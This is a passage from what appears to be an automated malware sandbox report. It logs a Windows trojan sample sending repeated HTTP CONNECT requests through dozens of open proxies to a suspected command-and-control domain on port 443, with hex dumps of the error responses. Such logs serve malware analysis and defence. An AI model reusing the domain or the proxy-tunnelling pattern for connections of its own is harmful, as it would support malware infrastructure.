                                                                                Feb 23, 2024 14:28:29.514897108 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 b3 e6 2f 80 91 fe 4b d5 ed 2d be 0b e8 0c 0b dd 00 aa b9 c0 47 02 3e 2d 4e 7e 2b 9e 23 8f d3 3d 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 96 7a 8c 89 ba 3b 34 0e 3a ca 2d 9d 91 86 6c 03 20 b2 ee 0e 08
                                                                                Data Ascii: %! /K-G>-N~+#=(z;4:-l j*o
                                                                                Feb 23, 2024 14:28:29.684662104 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 83 20 53 11 ae e6 15 8a b2 d9 8f 8a c3 e9 a2 30 c9 45 eb fb 5f d3 5e e6 d6 3d 6a 0d 4d 4a aa 77 11 72 f4 e8 9e b8 20 57
                                                                                Data Ascii: ( S0E_^=jMJwr W


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                957192.168.2.8530365.9.98.14230005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.833084106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                958192.168.2.85307145.81.232.17543935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.845577955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382388115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.992259026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.194981098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.379453897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.585803986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                959192.168.2.85313445.55.57.2044435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.845877886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                960192.168.2.852653132.148.130.78238365828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.846860886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.882483959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.883744955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882782936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                961192.168.2.85313745.55.57.2044435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.847970963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                962192.168.2.85314045.55.57.2044435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.849853039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                963192.168.2.85314245.55.57.2044435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.851234913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                964192.168.2.85309566.228.35.209233445828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.859468937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.272736073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.695255995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.398085117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.695185900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898521900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.194999933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.693334103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.658207893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                965192.168.2.85262051.75.126.150646155828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.863754988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                966192.168.2.852939103.49.202.252805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.879987955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.268872976 CET343INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 182
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                967192.168.2.852621162.214.227.68573375828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.879991055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.882467031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.883717060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882802963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                968192.168.2.852982121.128.194.154805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.896601915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                969192.168.2.85308298.178.72.21109195828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.908819914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                970192.168.2.85308320.58.43.14820285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.912221909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382481098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991872072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991797924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898216009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.898194075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820547104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581837893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                971192.168.2.8529628.213.129.20195828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.921027899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                972192.168.2.853120172.67.127.188805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.921144962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.009013891 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                973192.168.2.85309945.43.84.16367885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.923825026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.351852894 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                974192.168.2.85296739.107.33.25480905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.929047108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.244277000 CET343INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.10.3 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 182
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                975192.168.2.85309651.75.126.150366945828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.931320906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.491832018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.194983959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                976192.168.2.852953125.94.219.9690915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.937427044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.290190935 CET325INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.1
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                977192.168.2.853139104.16.213.202805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.937501907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.025789976 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                978192.168.2.853125104.16.221.57805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.938160896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.026859999 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                979192.168.2.852957103.118.46.17480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.938316107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                980192.168.2.85294358.253.210.12288885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.943450928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                981192.168.2.853121159.203.5.54582495828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.950625896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                982192.168.2.853074221.153.92.39805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.957282066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.233163118 CET310INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 150
                                                                                Connection: close
